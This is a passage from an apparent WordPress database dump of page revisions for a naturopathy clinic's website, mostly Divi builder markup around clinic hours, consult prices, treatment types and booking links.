#666666;\">Tues/Wed: 9:30am-5:30pm</span></span></h3>\n<h3><span style=\"font-family: Montserrat; font-size: large;\"><span style=\"font-family: Montserrat; color: #666666;\">Thurs: 10am-7pm</span></span></h3>\n<h3><span style=\"font-family: Montserrat; font-size: large;\"><span style=\"font-family: Montserrat; color: #666666;\">Sat: 9:30am-1pm</span></span></h3>\n<h3><span style=\"font-family: Montserrat; font-size: large;\"><span style=\"font-family: Montserrat; color: #666666;\"></span></span></h3>\n<h3><span style=\"font-family: Montserrat; font-size: large;\"><span style=\"font-family: Montserrat; color: #666666;\">Online consults available. Please get in touch if the above days/times are unsuitable.</span></span></h3>\n<p><span style=\"font-family: Montserrat; font-size: large;\"><span style=\"font-family: Montserrat; color: #666666;\"></span></span></p>\n<p><span style=\"font-family: \'Playfair Display\'; color: #000000; font-size: x-large;\">Clinic location</span></p>\n<p><span style=\"font-family: Montserrat; font-size: large;\">Kalamunda (address given upon booking). </span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Footer\" _builder_version=\"4.9.4\" use_background_color_gradient=\"on\" background_color_gradient_start=\"rgba(255,255,255,0.8)\" background_color_gradient_end=\"rgba(255,255,255,0.8)\" background_color_gradient_overlays_image=\"on\" background_image=\"https://verdenaturopathy.com.au/wp-content/uploads/2025/04/Untitled-design.png\" background_enable_image=\"on\" parallax=\"on\" overflow-x=\"hidden\" overflow-y=\"hidden\" global_module=\"188\" saved_tabs=\"all\" locked=\"off\"][et_pb_row _builder_version=\"4.9.4\" width=\"60%\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" header_2_font=\"ZCOOL XiaoWei||||||||\" header_2_text_color=\"#a9804a\" header_2_font_size=\"80px\" text_orientation=\"center\" max_width=\"550px\" max_width_tablet=\"350px\" max_width_phone=\"220px\" max_width_last_edited=\"on|desktop\" module_alignment=\"center\" custom_margin=\"|||265px||\" header_2_font_size_tablet=\"48px\" header_2_font_size_phone=\"30px\" header_2_font_size_last_edited=\"on|phone\" border_color_all=\"#ccd4c8\" border_color_left=\"#a9804a\" inline_fonts=\"Playfair Display\"]<h2><span style=\"font-family: \'Playfair Display\'; font-weight: normal; color: #000000;\">Clinic info</span></h2>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" _builder_version=\"4.4.7\"][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<h3><span style=\"font-family: \'Playfair Display\'; font-weight: normal;\"><strong>Location</strong></span></h3>\n<p><span style=\"font-family: Montserrat;\">Kalamunda & online</span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.8\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\"][/et_pb_text][et_pb_button button_url=\"https://verdenaturopathy.com.au/bookings\" button_text=\"Make a booking\" button_alignment=\"center\" _builder_version=\"4.9.4\" custom_button=\"on\" button_text_size=\"22px\" button_text_color=\"#000000\" button_bg_color=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" button_border_width=\"2px\" button_border_color=\"#000000\" button_border_radius=\"50px\" button_font=\"Montserrat|600|||||||\" button_icon_color=\"#000000\" background_layout=\"dark\" custom_margin_tablet=\"0px||||false|false\" custom_margin_last_edited=\"off|desktop\" custom_padding=\"15px|40px|15px|40px|true|true\" hover_enabled=\"0\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" locked=\"off\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22button_bg_color%22%93}\" sticky_enabled=\"0\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" custom_padding=\"||0px|||\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat,Playfair Display\"]<h3><span style=\"font-family: \'Playfair Display\';\"><strong>Clinic Hours</strong></span></h3>\n<p><span style=\"font-family: Montserrat;\">Tues/Wed: 9:30am-5:30pm</span><br /><span style=\"font-family: Montserrat;\">Thurs: 9:30am-7pm</span><br /><span style=\"font-family: Montserrat;\">Saturday: 9:30am-1pm</span></p>\n<p> </p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Contact','','inherit','closed','closed','','26-revision-v1','','','2025-04-09 21:27:39','2025-04-09 13:27:39','',26,'https://verdenaturopathy.com.au/?p=471',0,'revision','',0),(476,1,'2025-06-27 10:42:00','2025-06-27 02:42:00','[et_pb_section fb_built=\"1\" admin_label=\"Footer\" _builder_version=\"4.9.4\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"rgba(249,243,235,0.8)\" background_color_gradient_overlays_image=\"on\" overflow-x=\"hidden\" overflow-y=\"hidden\" custom_padding=\"||0px|||\" locked=\"off\"][et_pb_row _builder_version=\"4.9.4\" _module_preset=\"default\" custom_margin=\"||||false|false\"][et_pb_column type=\"4_4\" _builder_version=\"4.9.4\" _module_preset=\"default\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"||20px||false|false\" custom_padding=\"||0px|||\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display,Montserrat\"]<h2><span style=\"font-family: \'Playfair Display\'; font-weight: normal;\">Naturopathic consults</span></h2>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" module_alignment=\"center\" custom_margin=\"||||false|false\" custom_padding=\"0px|0px|0px|0px|true|false\" border_radii=\"off||||\" box_shadow_style=\"preset2\" box_shadow_color=\"#000000\"][et_pb_column type=\"1_3\" _builder_version=\"4.9.4\" _module_preset=\"default\" custom_padding=\"|0px||0px|false|false\"][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/4-01.png\" title_text=\"4-01\" align=\"center\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#ccd4c8\" height=\"140px\" custom_margin=\"||20px||false|false\" custom_padding=\"30px||30px||false|false\"][/et_pb_image][et_pb_blurb title=\"Initial (60 min) - $190\" use_icon=\"on\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" module_alignment=\"center\" custom_padding=\"10px|10px|10px|10px|false|false\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]<span style=\"font-family: Montserrat;\">An in-depth dive into your presenting complaint, health history, diet and lifestyle. This time will allow us to formulate a patient-centric treatment plan taking into account your health goals, priorities and budget. </span>\n\n<span style=\"font-family: Montserrat;\">Prescribed treatments such as herbal medicine, nutritional supplements, creams or flower essences may also form part of your treatment plan. Lifestyle and dietary recommendations will also be included.</span>\n\n<span style=\"font-family: Montserrat;\">Pathology testing or referrals may be recommended.</span>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.9.4\" background_enable_color=\"off\" custom_padding=\"0px|0px|0px|0px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"0px||0px||true|false\" custom_padding_last_edited=\"on|phone\"][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/3-01.png\" title_text=\"3-01\" align=\"center\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#ccd4c8\" custom_margin=\"||20px||false|false\" custom_padding=\"30px||30px||false|false\"][/et_pb_image][et_pb_blurb title=\"Follow-up (30 min) - $95\" use_icon=\"on\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" module_alignment=\"center\" custom_padding=\"10px|10px|10px|10px|false|false\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]<span style=\"font-family: Montserrat;\">This time is used to review your progress and make the necessary changes to your treatment plan and/or health goals. We will discuss any new concerns you may have and formulate a timeline with which to base your treatment on.</span>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.9.4\" background_enable_color=\"off\" custom_padding=\"0px|0px|0px|0px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"0px||0px||true|false\" custom_padding_last_edited=\"on|phone\"][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/2-01.png\" title_text=\"2-01\" align=\"center\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#ccd4c8\" width=\"100%\" custom_margin=\"||20px||false|false\" custom_padding=\"30px||30px||false|false\"][/et_pb_image][et_pb_blurb title=\"Express (20 min) - $65\" use_icon=\"on\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" module_alignment=\"center\" custom_padding=\"10px|10px|10px|10px|false|false\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]<span style=\"font-family: Montserrat;\">A shorter consult devoted to acute conditions such as colds/flus, infections/illness, recent sleep upset, seasonal allergies, emotional health issues or script reviews. Not suitable for long-term or chronic health issues.</span> Existing clients only.[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.4.7\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"||20px||false|false\" custom_padding=\"||0px|||\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display,Montserrat\"]<h2><span style=\"font-family: \'Playfair Display\'; font-weight: normal;\">Treatments</span></h2>\n<p><span style=\"font-size: large; font-family: Montserrat;\">As naturopaths, we have the knowledge base and training to prescribe various treatment forms that work synergistically to improve your health and vitality.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" min_height=\"425px\" custom_margin=\"-1px||||false|false\" custom_margin_tablet=\"0px||||false|false\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"0px||0px||true|false\" box_shadow_style=\"preset2\" box_shadow_color=\"#000000\"][et_pb_column type=\"1_4\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Herbal medicine\" image=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/5-01.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<span style=\"font-family: Montserrat;\">Liquid herbal blends</span>\nCapsules/tablets\nTeas\nTopical creams[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Nutritional medicine\" image=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/3-01.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Muli||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<span style=\"font-family: Montserrat;\">Food as medicine</span>\n<span style=\"font-family: Montserrat;\">Nutritional compounds</span>\n<span style=\"font-family: Montserrat;\">Supplements</span>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Lifestyle \" image=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/1-01.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Muli||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<p><span style=\"font-family: Montserrat;\">Stress strategies</span><br /><span style=\"font-family: Montserrat;\">Exercise and movement</span><br /><span style=\"font-family: Montserrat;\">Mindfulness </span><br /><span style=\"font-family: Montserrat;\">Sleep hygiene</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Energetic medicine\" image=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/4-01.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Muli||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<span style=\"font-family: Montserrat;\">Flower essences </span>[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.9.4\" _module_preset=\"default\"][et_pb_column type=\"4_4\" _builder_version=\"4.9.4\" _module_preset=\"default\"][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Feature\" _builder_version=\"4.9.4\" background_image=\"https://verdenaturopathy.com.au/wp-content/uploads/2025/04/Untitled-design.png\" background_enable_image=\"on\" parallax=\"on\" custom_padding=\"7px|||||\"][et_pb_row _builder_version=\"4.9.4\" _module_preset=\"default\" custom_margin=\"||||false|false\"][et_pb_column type=\"4_4\" _builder_version=\"4.9.4\" _module_preset=\"default\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"||20px||false|false\" custom_padding=\"||0px|||\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display,Montserrat\"]<h2><span style=\"font-family: \'Playfair Display\'; color: #000000;\">Clinic info</span></h2>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" _builder_version=\"4.4.7\"][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" custom_padding=\"||3px|||\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat,Playfair Display\"]<h3><strong><span style=\"font-family: \'Playfair Display\';\">Location</span></strong></h3>\n<p><span style=\"font-family: Montserrat;\">Kalamunda & online</span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.8\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\"]<h3></h3>[/et_pb_text][et_pb_button button_url=\"https://verdenaturopathy.com.au/bookings\" button_text=\"Make a booking\" button_alignment=\"center\" _builder_version=\"4.9.4\" custom_button=\"on\" button_text_size=\"22px\" button_text_color=\"#000000\" button_bg_color=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" button_border_width=\"2px\" button_border_color=\"#000000\" button_border_radius=\"50px\" button_font=\"Montserrat|600|||||||\" background_layout=\"dark\" custom_margin_tablet=\"0px||||false|false\" custom_margin_last_edited=\"off|desktop\" custom_padding=\"15px|40px|15px|40px|true|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" locked=\"off\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22button_bg_color%22%93}\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<h3></h3>\n<h3><strong><span style=\"font-family: \'Playfair Display\';\">Clinic Hours</span></strong></h3>\n<span style=\"font-family: Montserrat;\">Tues/Wed: 9:30am-5:30pm</span>\n<span style=\"font-family: Montserrat;\">Thurs: 10am-7pm</span>\n<span style=\"font-family: Montserrat;\">Saturday: 9:30am-1pm</span>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Services','','inherit','closed','closed','','424-revision-v1','','','2025-06-27 10:42:00','2025-06-27 02:42:00','',424,'https://verdenaturopathy.com.au/?p=476',0,'revision','',0),(480,1,'2025-09-16 18:04:53','2025-09-16 10:04:53','[et_pb_section fb_built=\"1\" admin_label=\"Footer\" _builder_version=\"4.9.4\" use_background_color_gradient=\"on\" background_color_gradient_start=\"rgba(255,255,255,0.8)\" background_color_gradient_end=\"rgba(255,255,255,0.8)\" background_color_gradient_overlays_image=\"on\" parallax=\"on\" overflow-x=\"hidden\" overflow-y=\"hidden\" hover_enabled=\"0\" saved_tabs=\"all\" locked=\"off\" background_color=\"#e6e5e1\" sticky_enabled=\"0\" template_type=\"section\"][et_pb_row _builder_version=\"4.9.4\" width=\"60%\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" header_2_font=\"ZCOOL XiaoWei||||||||\" header_2_text_color=\"#a9804a\" header_2_font_size=\"80px\" text_orientation=\"center\" max_width=\"550px\" max_width_tablet=\"350px\" max_width_phone=\"220px\" max_width_last_edited=\"on|desktop\" module_alignment=\"center\" custom_margin=\"|||265px||\" header_2_font_size_tablet=\"48px\" header_2_font_size_phone=\"30px\" header_2_font_size_last_edited=\"on|phone\" border_color_all=\"#ccd4c8\" border_color_left=\"#a9804a\" inline_fonts=\"Playfair Display\"]<h2><span style=\"font-family: \'Playfair Display\'; font-weight: normal; color: #000000;\">Clinic info</span></h2>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" _builder_version=\"4.4.7\"][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<h3><span style=\"font-family: \'Playfair Display\'; font-weight: normal;\"><strong>Location</strong></span></h3>\n<p><span style=\"font-family: Montserrat;\">Kalamunda & online</span><span style=\"font-family: Montserrat;\"></span></p>\n<p><span style=\"font-family: Montserrat;\"></span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.8\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\"][/et_pb_text][et_pb_button button_url=\"https://verdenaturopathy.com.au/bookings\" button_text=\"Make a booking\" button_alignment=\"center\" _builder_version=\"4.9.4\" custom_button=\"on\" button_text_size=\"22px\" button_text_color=\"#000000\" button_bg_color=\"#CCD4C8\" button_border_width=\"2px\" button_border_color=\"#000000\" button_border_radius=\"50px\" button_font=\"Montserrat|600|||||||\" button_icon_color=\"#000000\" background_layout=\"dark\" custom_margin_tablet=\"0px||||false|false\" custom_margin_last_edited=\"off|desktop\" custom_padding=\"15px|40px|15px|40px|true|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" locked=\"off\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22button_bg_color%22%93}\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" custom_padding=\"||0px|||\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat,Playfair Display\"]<h3><span style=\"font-family: \'Playfair Display\';\"><strong>Clinic Hours</strong></span></h3>\n<p><span style=\"font-family: Montserrat;\">Tues/Wed: 9:30am-5:30pm</span><br /><span style=\"font-family: Montserrat;\">Thurs: 9:30am-7pm</span><br /><span style=\"font-family: Montserrat;\">Saturday: 9:30am-1pm</span></p>\n<p> </p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','clinic info','','inherit','closed','closed','','188-revision-v1','','','2025-09-16 18:04:53','2025-09-16 10:04:53','',188,'https://verdenaturopathy.com.au/?p=480',0,'revision','',0),(481,1,'2025-09-16 18:04:54','2025-09-16 10:04:54','[et_pb_section fb_built=\"1\" admin_label=\"Header\" _builder_version=\"4.9.4\" background_enable_color=\"off\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"rgba(249,243,235,0.8)\" min_height=\"0px\" custom_margin=\"||1px|||\" custom_padding=\"||0px||false|false\" locked=\"off\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22colorStart%22%93}\" colorStart=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\"][et_pb_row _builder_version=\"4.9.4\"][et_pb_column 